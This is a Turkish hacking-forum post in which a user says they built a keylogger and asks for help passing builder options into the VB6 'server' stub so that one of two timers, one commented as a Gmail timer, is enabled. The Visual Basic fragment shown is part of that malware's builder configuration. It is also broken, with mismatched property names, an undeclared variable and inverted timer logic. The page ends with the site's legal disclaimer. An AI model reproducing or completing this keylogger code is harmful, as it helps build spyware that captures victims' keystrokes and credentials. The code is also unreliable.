Vb6 Resource Yardım :(

lord6809

Yeni üye
2 Ocak 2016
28
0
Merhabalar Arkadaşlar sizden bi ricam varda
Keylogger yaptım Server de 2 tane timerim var Timer2 ve Timer4

Builderde 2 tane option1 ve option2
Propbag.WriteProperty "Saydırhot", Option1.Value
Propbag.WriteProperty "Saydırgg", Option2.Value

Severde
Dim Propbag As New PropertyBag
Dim mail, şifre, süre, timerhot, timergg As String

timerhh = Propbag.ReadProperty("Saydırhh")
timergg = Propbag.ReadProperty("Saydırgg")

If timerhh = 1 Then

Timer2.Enabled = True
Else

Timer4.Enabled = False
End If
'gmailtimer
If timergg = 1 Then

Timer4.Enabled = True
Else

Timer2.Enabled = False
End If

Yani demek istedigim Builderde Option1 tıklayıp oluşturdugumda Timer2 enabled true Timer4 enabled false olucak Option 2 tıklayıp oluşturdugumda Timer4 enabled true Timer2 enabled false olucak

Arkadaşlar herşeyi resource edıyorum ama (TİMER) bir türlü resource edemıyorum servere

Lütfen Bilen biri varsa bir yardım etsin şimdiden teşekkürler

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.